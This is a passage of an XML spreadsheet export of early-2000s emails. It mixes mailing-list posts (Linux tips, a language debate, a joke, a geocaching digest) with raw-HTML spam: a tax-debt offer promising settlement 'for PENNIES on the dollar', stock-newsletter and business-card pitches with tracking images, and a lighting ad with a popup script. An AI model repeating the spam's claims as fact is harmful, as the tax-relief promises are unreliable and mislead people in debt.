    <t xml:space="preserve">Subject: RedHat 8.0 ISO Mirror(s)
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000206.html
 Date: 2002-10-01T06:31:54-08:00
 Thanks to an anonymous helper, I've mirrored all 5 ISO images for Red Hat 8.0. 
 Ohio - http://family.zawodny.com/~jzawodn/iso/rh80/ (DS-3 connection via 
 Sprint) California - http://litterbox.zawodny.com/~jzawodn/iso/rh80/ (multiple 
 gigabit connections) Now be nice. :-)...
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Get 250 full-color business cards FREE
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;VistaPrint.com&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;&lt;center&gt;
 &lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hEY0CCzME0D40EW0AN"&gt;&lt;table width="565" cellspacing="0" cellpadding="0" border="0"&gt;
 &lt;tr&gt;
     &lt;td width="331"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hEY0CCzME0D40EW0AN"&gt;&lt;img src="http://images.sandbox.com/images/email/vistaprint_KIT_FREE_text.gif" width="331" height="128" border="0" alt="" title="VistaPrint.com"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td rowspan="2" width="234"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hEY0CCzME0D40EW0AN"&gt;&lt;img src="http://images.sandbox.com/images/email/vistaprint_KIT_two_ladies.jpg" width="234" height="234" border="0" title="VistaPrint.com" alt=""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
     &lt;td width="331"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hEY0CCzME0D40EW0AN"&gt;&lt;img src="http://images.sandbox.com/images/email/vistaprint_KIT_stay_close.gif" width="331" height="106" border="0" title="VistaPrint.com" alt=""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
     &lt;td width="331"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hEY0CCzME0D40EW0AN"&gt;&lt;img src="http://images.sandbox.com/images/email/vistaprint_KIT_bullets.gif" width="331" height="92" border="0" title="VistaPrint.com" alt=""&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td width="234"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hEY0CCzME0D40EW0AN"&gt;&lt;img src="http://images.sandbox.com/images/email/vistaprint_KIT_logo.gif" width="234" height="92" border="0" title="VistaPrint.com" alt=""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
     &lt;td width="331"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hEY0CCzME0D40EW0AN"&gt;&lt;img src="http://images.sandbox.com/images/email/vistaprint_KIT_Animated_BC.gif" width="331" height="124" border="0" title="VistaPrint.com" alt=""&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;td width="234"&gt;&lt;a href="http://ct2.consumertoday.net/cgi-bin14/flo?y=hEY0CCzME0D40EW0AN"&gt;&lt;img src="http://images.sandbox.com/images/email/vistaprint_KIT_button.gif" width="234" height="124" border="0" title="VistaPrint.com" alt=""&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/a&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;BR&gt;&lt;BR&gt;&lt;CENTER&gt;&lt;table border="1" cellpadding="3" cellspacing="0" width="550" bordercolor="#000000" body bgcolor="white"&gt;
 &lt;tr&gt;&lt;td width="551" height="5" align="center" valign="middle"&gt;&lt;table width="550" border="0" cellspacing="0" cellpadding="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;FONT FACE="Verdana, Modern, Arial" SIZE="2" color="gray"&gt;We take your privacy very seriously and it is our policy never to send unwanted email messages. This message has been sent to gibbs@midrange.com because you are a member of Consumer Today or you signed up with one of our marketing partners. To unsubscribe, simply click &lt;a href="http://unsub.ct.consumertoday.net/consumer_today/ct_site_unsub.html"&gt;&lt;font color="blue"&gt;&lt;u&gt;here&lt;/u&gt;&lt;/font&gt;&lt;/a&gt; (please allow 3-5 business days for your unsubscribe request to be processed). Questions or comments - send them to &lt;a href="mailto:customerservice@consumertoday.net"&gt;&lt;font color="blue"&gt;&lt;u&gt;customerservice@consumertoday.net&lt;/u&gt;&lt;/font&gt;&lt;/a&gt;.&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/center&gt;&lt;/body&gt;
 &lt;IMG SRC="http://ct2.consumertoday.net/cgi-bin14/flosensing?y=EY0CCzME0D40By"&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Interest rates slashed! Don't wait!                                                   xoxun
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Eliminate Back Taxes Forever! ybf
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="548" border="0" style="border-style:double; border-color:#FFFFFF; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="13" height="423"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-style:double; border-width:12; border-collapse: collapse" bordercolor="#FF0000"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td bgcolor="#0359A2"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana" style="font-size: 30pt; font-weight: 700" color="#FFFFFF"&gt;
               &amp;nbsp;&lt;/font&gt;&lt;b&gt;&lt;font face="Verdana" color="#FFFFFF" size="6"&gt;IRS TAX 
               PROBLEMS?&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;font color="#FFFFFF"&gt;&lt;span style="font-weight: 700"&gt;
               &lt;font face="Verdana" style="font-size: 10.5pt"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
               &lt;/font&gt;&lt;/span&gt;&lt;/font&gt;
               &lt;font color="#FFFFFF" face="Verdana" size="5"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;
               &lt;font color="#FFFFFF" face="Verdana" size="6"&gt;It's Time to&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana" size="5" color="#FFFFFF"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
               &lt;/font&gt;&lt;font face="Verdana" color="#FFFFFF" size="7"&gt;Eliminate&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana" size="5" color="#FFFFFF"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
               your IRS tax problems&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;b&gt;&lt;font face="Verdana" color="#FFFFFF" style="font-size: 42pt"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
               NOW!&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;font color="#FFFFFF"&gt;&lt;b&gt;
               &lt;font face="Verdana" style="font-size: 10.5pt"&gt;&amp;nbsp;&amp;nbsp; &lt;/font&gt;
               &lt;/b&gt;&lt;/font&gt;&lt;span style="font-weight: 700"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" style="font-size: 16pt" color="#FFFFFF"&gt;
               Let Our Qualified People HELP You&lt;/font&gt;&lt;/span&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FFFFFF" size="4"&gt;
               We Can Settle Your Back Taxes For PENNIES On The Dollar&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="505" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64" bgcolor="#0359A2" width="499"&gt;
             &lt;b&gt;
             &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font size="2" color="#FFFFFF"&gt;Respond&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2" color="#FFFFFF"&gt; 
                 now and one of our Debt Pros will get back to you within 48 
                 hours.&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.72/irshelp/index.htm?ID=t15"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
             &lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;If You wish to be removed from future mailings please &amp;quot;&lt;a href="http://66.231.133.68/final/index_remoov.html?ID=t15"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 2002-10-06 at 21:17, Alvie wrote:
 &gt; hdparm -d1 /dev/hdc says Operation not Permitted.
 &gt; DVD playback is very jumpy.
 &gt; Does someone have any ideas on what I can do yo get DMA transfers?
 &gt; Thanks Alvie
 Add to /etc/modules.conf:
 options ide-cd dma=1
 -- 
 Chris Kloiber
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "R" == Robert Harley &lt;harley@argote.ch&gt; writes:
     R&gt; GLM wrote:
     &gt;&gt; And a Java program, due to the extensive class libraries, will
     &gt;&gt; weigh in at 10% the number of lines of the equivalent C
     &gt;&gt; program.  QED.
     R&gt; There are massive amounts of libraries for C, Fortran and so
     R&gt; on.  To pick an obvious example., if you want to do linear
     R&gt; algebra, then Java isn't a serious candidate at all.
 If you want to do http, C gets pretty muddy (curl is about the best
 choice I've found) but I grant you that: No language is the be-all and
 end-all.
 I envy some of those posting to this list.  I've been in business for
 24 years and I haven't yet had the luxury of writing every line of
 code for any project. We are always coerced by budgets and time to
 maximize the amount of work done elsewhere.  
 As much as I hate dealing with someone else's blackbox, as much as
 I've spent sleepless nights second-guessing external libs, I've never
 ever had the luxury to do otherwise. It must be wonderful to be
 responsible for something you are actually responsible for, and I am
 so sick of being blamed for other people's design mistakes.
 Maybe there's an archive somewhere I need to know about, but I've been
 using C since DrDobbs first published SmallC and yet I've never found
 any decent LGPL libs cataloged in such a way that I can just type in
 the task and get back an API.  Because of Javadoc, which is by no
 means perfect, Java provides me the second best catalog of 3rd-party
 libs, second only to Perl's CPAN -- Perl is one language I also really
 hate with a passion, yet end up using the most for exactly this reason.
 For example, take the recent CBC Olympics site: I needed to roll
 together a telnet client with a tokenizer, perl-regex preprocessing a
 stream to produce parseable XML, project that XML into relational
 databases using only the DTD to generate the rdbms schema, and open an
 XMLRPC interface to read and post items into the news stream.  Where
 can I find C libs for those components?  
 On the webserver, we then needed a multithreaded read-only http socket
 which can spawn persistent data-caching servlets that periodically
 refresh themselves over socket connections to the relational database,
 presenting the retreived values through XSLT-defined transforms, and
 again, where can I find such stuff for C ... or for any other langauge
 but Java?  Wombat (servlet spec for Perl) was inviting, but it's not
 ready for prime-time, and re-inventing that entire shopping list in C
 is just not feasible for one programmer to do inside of 8 weeks.
 When you need C libs, or even C++ libs, where's the best place to shop?
 Where do you find standards-based portable RDBMS API? (ODBC?) How do
 you evaluate these things without actually fetching every one and
 trying it out?
 In a perfect universe, I'd use Ocaml or even Ruby, but I don't see the
 social infrastructure for either happening during my professional
 lifetime.
     R&gt; Why do so many people outside of Sun's marketing department
     R&gt; consider Java to be "Write Once, Debug Everywhere" ?
 A collegue at Cognos (Henk?) called C "the nearly-portable assembler"
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: calling wayne baisley@#!
</t>
  </si>
  <si>
    <t xml:space="preserve">You around?
 C
 -- 
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] The Age Old 'Which Mailer' Question
</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to manage the email for a domain which I have hosted with
 hosting365, and am trying to get the whole email send and receive thing
 working nice and easily.
 At the moment I have configured Fetchmail to poll the different pop3
 mailboxes and deliver the mail accordingly, although it appears that I have
 to have only one unix user being able to receive from each pop3 mailbox.
 This could be a limitation of the fetchmailconf programme, I'm not sure, but
 It would be much handier if I could just tell it to collect all of the mail
 from the different mailboxes, and then deliver it locally according to the
 "To:" header instead of the pop3 mailbox it came from.
 The other issue I am having is sending outgoing mail.  I have been trying to
 use sendmail, but am finding it to be an absolute pain in the posterior, and
 when the relay server will only accept outgoing connections if I have
 checked for incoming mail in the last twenty minutes, and I don't know how
 to set sendmail to run a command before it sends out the mail.  Do any of
 the outgoing mailer programs, exim or postfix or whatever, have a 'nice'
 configuration interface, or do they all have nice friendly configuration
 files like sendmail.
 Any suggestions of alternative solutions would be much appreciated.  There
 are only three or four email addresses in my domain, and setting it up for
 scheduled collection and either scheduled or immediate delivery would do me
 fine.
 Thanks,
 	David.
 David Hamilton
 Senior Technical Consultant
 HP Ireland 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">My only joke, thanks to a professor at the University of Manitoba, circa 
 1997. Set in the old west.
 A cowboy is riding along on his favorite horse when he's suddenly 
 surrounded and taken prison by a band of roaming Indians. The indians 
 take the cowboy and his horse and tell him the traditional way that the 
 tribe deals with their victims:
 Each day for the next 3 days, you get a wish. If its in our power to 
 grant it to you, we will. After the 3rd wish is done, you die a horrible 
 slow death. Time for your first wish.
 The cowboy thinks a bit, and says "I want to talk to my horse." So the 
 indians bring the horse over, the cowboy whispers in his ears, and the 
 horse runs off. A little while later the horse comes back with a 
 beautiful blond naked woman. The cowboy and the woman go in the tent, 
 appropriate noises are heard, and then the horse takes the woman away.
 The next day, time for the wish comes, and the Indians, amazed at 
 yesterday's performance, all gather round. The cowboy says "I want to 
 talk to my horse". So the horse is brought over, the cowboy whispers in 
 its ears, and the horse takes off. A little while later the horse comes 
 back, with a beautiful brunette, naked, same routine as before, cowboy 
 and the women go in the tent, ..., etc.
 On the third and final day, the indians are totally amazed, and are 
 eager to hear what the cowboy's wish will be. So they all gather round, 
 and the cowboy again says "I want to talk to my horse." The horse is 
 brought over, and this time the cowboy grabs the horse by the head, 
 stares right at him, and says -- "Read my lips -- Posse! Posse!"
 Owen
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Geocaching.com Weekly Cache Notification
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings from Geocaching.com -
 Recent caches in your area...
 9/10/2002 (Texas)
 Horsin' Around by Shellyfish &amp; Jerry227
 (Traditional Cache) (GC8CA0) (19.44 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=36000
 10/27/2002 (Texas)
 NTGA Org. Meeting/Class by Wolf Song
 (Event Cache) (GC81C2) (25.8 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=33218
 9/22/2002 (Texas)
 NTGA Organizational Meeting/Class by Wolf Song
 (Event Cache) (GC81C1) (25.8 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=33217
 9/8/2002 (Texas)
 The Nostaglia Zone by VeggieDog
 (Traditional Cache) (GC8C58) (26.83 miles W)
 http://www.geocaching.com/seek/cache_details.asp?ID=35928
 9/7/2002 (Texas)
 Rainy Day Cache by Ma Bell  (named by geovamp and msdark)
 (Traditional Cache) (GC8B06) (28.92 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=35590
 9/11/2002 (Texas)
 Fire Station #7:  In Honor of 9-11-2001 by Arcane Cacher (adopted by Web-ling 8/30/02)
 (Traditional Cache) (GC26F) (33.46 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=623
 9/9/2002 (Texas)
 Tired of Bronze by GeoGoddess and Waterlily
 (Virtual Cache) (GC8D03) (41.65 miles W)
 http://www.geocaching.com/seek/cache_details.asp?ID=36099
 9/10/2002 (Texas)
 The Island by tomboy
 (Virtual Cache) (GC8CAC) (42.87 miles S)
 http://www.geocaching.com/seek/cache_details.asp?ID=36012
 9/28/2002 (Texas)
 DFW Field Day #1 by loubob57
 (Event Cache) (GC8644) (47.92 miles W)
 http://www.geocaching.com/seek/cache_details.asp?ID=34372
 9/5/2002 (Texas)
 Pirates Booty by Nitehawker
 (Traditional Cache) (GC8A34) (50.51 miles SW)
 http://www.geocaching.com/seek/cache_details.asp?ID=35380
 9/7/2002 (Texas)
 Sunshine at Weatherford by sportrak ,Black_ronin
 (Traditional Cache) (GC8ADB) (69.18 miles W)
 http://www.geocaching.com/seek/cache_details.asp?ID=35547
 9/9/2002 (Texas)
 Leave It to Beaver by Tweedler
 (Traditional Cache) (GC8C6F) (84.14 miles SE)
 http://www.geocaching.com/seek/cache_details.asp?ID=35951
 Your account name is 'lrosenman'.  If you would like to be removed from this
 list, please log into the web site and uncheck cache notifications through
 the "modify your account" link on your "my cache page".
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Born to be wild - then shot
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8622118,215/
 Date: 2002-10-07T03:52:58+01:00
 36 million pheasants now reared for Britain's fastest growing 'sport'.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your NEW "Leg-Up" on Wall Street...
</t>
  </si>
  <si>
    <t xml:space="preserve">You are receiving this email because you signed up to 
 receive one of our free reports. If you would prefer 
 not to receive messages of this type, please 
 unsubscribe by following the instructions at the 
 bottom of this message.
 Dear Investor,
 Thank you again for requesting our free special 
 report, "The One Stock that Keeps Wall Street 
 BUZZING."
 We began The Motley Fool in 1993 with the idea that 
 investors like you deserved better. 
 Better than Wall Street's all-too-often biased 
 research...  Better than analysts who speak in "secret 
 codes" allowing them to hedge or spin any 
 recommendation...  and better than what passes for "full 
 financial disclosure" in big business today.
 Given a level playing field, we believe that regular 
 folks -- like us, and you -- can do quite well in the 
 stock market. Why put trust in conflicted information 
 from others when you could count on your own 
 abilities, and potentially blow the pros away? 
 More than two million people visit our Fool.com web 
 site each month.  We spend a great deal of time at 
 Fool.com instructing people HOW to invest, but not so 
 much about WHERE to invest. 
 And that's why we created the Motley Fool Stock 
 Advisor.
 You are cordially invited to join us as a Charter 
 Subscriber to Motley Fool Stock Advisor as we focus on 
 the great companies of the U.S. stock market. 
 In the same, honest, no-holds-barred style that has 
 made Fool.com so popular with investors, we'll bring 
 you our best stock recommendations and other financial 
 insights to help you achieve your financial dreams.
 As a Charter Subscriber, you'll get the Motley Fool 
 Stock Advisor newsletter delivered to your home each 
 month -- a personal communication from us, David &amp; Tom 
 Gardner.  We'll tell you exactly why we believe a 
 stock is poised for significant growth -- and give you 
 all the facts to back that analysis up.  You'll get 
 the good, the bad and the ugly on every recommendation 
 we make -- so you can make each investing decision 
 with great confidence.
 Of course, there's more to our Motley Fool Stock 
 Advisor than our monthly newsletter.
 You'll also receive our monthly, between-issue, e-mail 
 Fool Flash to help you take full advantage of breaking 
 opportunities.  And you can log on anytime at the 
 Motley Fool Stock Advisor subscriber-only Web site, 
 featuring current &amp; back newsletter issues...full 
 updates on our selected stocks...Q &amp; A...and more.
 Best of all, you can try our Motley Fool Stock Advisor 
 entirely RISK-FREE.
 The Motley Fool community has always been based upon 
 trust and value -- principles we intend to continue 
 here. So we want to give you plenty of time to decide 
 if our Motley Fool Stock Advisor is a valuable 
 investing tool for you.
 You can try our Motley Fool Stock Advisor for six full 
 months 100% RISK-FREE. If we don't prove its worth to 
 you, it doesn't cost you a dime.
 And you have our word on that.
 So join us now. It's going to be fun. It's going to be 
 exciting. And it's going to be an enriching experience 
 you won't want to miss.
 To join us, RISK-FREE, as a Charter Subscriber to 
 David &amp; Tom Gardner's Motley Fool Stock Advisor, 
 simply click here now: 
 http://www.ppi-orders.com/index.htm?promo_code=1UE728
 Foolishly yours,
 David &amp; Tom Gardner
 The Motley Fool
 P.S. Click here 
 http://www.ppi-orders.com/index.htm?promo_code=1UE728
 to check out the FREE bonuses you get when you 
 subscribe.  Special Reports; videos; online seminars -
 - all yours to enjoy and keep, even if you cancel your 
 trial subscription to our Motley Fool Stock Advisor.
 Remember, you have six full months to evaluate our new 
 service.  Don't like what you see, don't make the 
 profits you expect...then it doesn't cost you a dime.  
 So this invitation is truly RISK-FREE.  Click here now 
 http://www.ppi-orders.com/index.htm?promo_code=1UE728
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 HOW TO UNSUBSCRIBE
 We hope this email message is of value to you. If 
 however, you do not wish to receive any of our future 
 messages, please unsubscribe by going to the following 
 web address:
 http://www.investorplace.com/newunsubscribe.php?q=66527235-1 
 **Note if you unsubscribe by replying to this message 
 please use Unsubscribe or Remove in the subject line. 
 Thu Jul 25 15:39:46 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: =?GBK?B?U3VuZnJvbSBsaWdodGluZyDE+rXEwvrS4srHztLDx9e3x/O1xMS/seo=?=
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Sunfrom lighting&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dgb2312"&gt;
 &lt;link href=3D"http://www.360ec.com/epost/feng/a.css" rel=3D"stylesheet" typ=
 e=3D"text/css"&gt;
 &lt;script language=3D"JavaScript" type=3D"text/JavaScript"&gt;
 &lt;!--
 function MM_reloadPage(init) {  //reloads the window if Nav4 resized
   if (init=3D=3Dtrue) with (navigator) {if ((appName=3D=3D"Netscape")&amp;&amp;(par=
 seInt(appVersion)=3D=3D4)) {
     document.MM_pgW=3DinnerWidth; document.MM_pgH=3DinnerHeight; onresize=
 =3DMM_reloadPage; }}
   else if (innerWidth!=3Ddocument.MM_pgW || innerHeight!=3Ddocument.MM_pgH)=
  location.reload();
 }
 MM_reloadPage(true);
 window.open("http://www.chinalightingmarket.com");
 //--&gt;
 &lt;/script&gt;
 &lt;/head&gt;
 &lt;body leftmargin=3D"0" topmargin=3D"0"&gt;
 &lt;table width=3D"778" border=3D"0" cellspacing=3D"0" cellpadding=3D"0" align=
 =3D"center"&gt;
   &lt;tr&gt;
     &lt;td height=3D"472"&gt;=20
       &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpadding=3D"0=
 "&gt;
         &lt;tr&gt;
           &lt;td width=3D"26%"&gt;&lt;img src=3D"http://www.360ec.com/epost/feng/ima=
 ges/top.gif" width=3D"265" height=3D"85"&gt;&lt;/td&gt;
           &lt;td width=3D"74%" background=3D"http://www.360ec.com/epost/feng/i=
 mages/top1.gif"&gt;&lt;br&gt;
             =A1=A1WEBSITE: &lt;br&gt; &lt;br&gt;
             &lt;strong&gt;=A1=A1 &lt;/strong&gt;&lt;strong&gt;&lt;font size=3D"3"&gt;&lt;a href=3D"htt=
 p://www.chinalightingmarket.com" class=3D"c"&gt;www.chinalightingmarket.com&lt;/a=
 &gt;&lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"100%" border=3D"0" cellpadding=3D"0" cellspacing=3D"0=
 " background=3D"http://www.360ec.com/epost/feng/images/top2.gif"&gt;
         &lt;tr&gt;
           &lt;td height=3D"259" valign=3D"top"&gt;=20
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" cellpaddin=
 g=3D"0"&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"266" height=3D"259"&gt;=20
                   &lt;table width=3D"15%" border=3D"0" cellspacing=3D"0" cellp=
 adding=3D"0"&gt;
                     &lt;tr&gt;=20
                       &lt;td width=3D"44%"&gt;&lt;img src=3D"http://www.360ec.com/ep=
 ost/feng/images/life.gif" width=3D"152" height=3D"89" border=3D"0" usemap=
 =3D"#Map"&gt;&lt;/td&gt;
                       &lt;td width=3D"56%"&gt;&lt;img src=3D"http://www.360ec.com/ep=
 ost/feng/images/life4.gif" width=3D"114" height=3D"89" border=3D"0" usemap=
 =3D"#Map4"&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td&gt;&lt;img src=3D"http://www.360ec.com/epost/feng/image=
 s/life1.gif" width=3D"152" height=3D"76" border=3D"0" usemap=3D"#Map2"&gt;&lt;/td=
 &gt;
                       &lt;td&gt;&lt;img src=3D"http://www.360ec.com/epost/feng/image=
 s/life5.gif" width=3D"114" height=3D"76" border=3D"0" usemap=3D"#Map5"&gt;&lt;/td=
 &gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td height=3D"64" colspan=3D"2"&gt;&lt;img src=3D"http://ww=
 w.360ec.com/epost/feng/images/life2.gif" width=3D"152" height=3D"84" border=
 =3D"0" usemap=3D"#Map3"&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;=20
                       &lt;td colspan=3D"2"&gt;&lt;img src=3D"http://www.360ec.com/ep=
 ost/feng/images/life3.gif" width=3D"152" height=3D"10"&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
                 &lt;td width=3D"249" align=3D"center"&gt;&lt;object classid=3D"clsid=
 :D27CDB6E-AE6D-11cf-96B8-444553540000" codebase=3D"http://download.macromed=
 ia.com/pub/shockwave/cabs/flash/swflash.cab#version=3D6,0,29,0" width=3D"23=
 4" height=3D"220" align=3D"middle"&gt;
                     &lt;param name=3D"movie" value=3D"http://www.360ec.com/epo=
 st/feng/tu.swf"&gt;
                     &lt;param name=3D"quality" value=3D"high"&gt;
                     &lt;embed src=3D"http://www.360ec.com/epost/feng/tu.swf" w=
 idth=3D"234" height=3D"220" align=3D"middle" quality=3D"high" pluginspage=
 =3D"http://www.macromedia.com/go/getflashplayer" type=3D"application/x-shoc=
 kwave-flash"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/td&gt;
                 &lt;td align=3D"center" valign=3D"middle"&gt; &lt;table width=3D"100=
 %"&gt;
                     &lt;tr&gt;
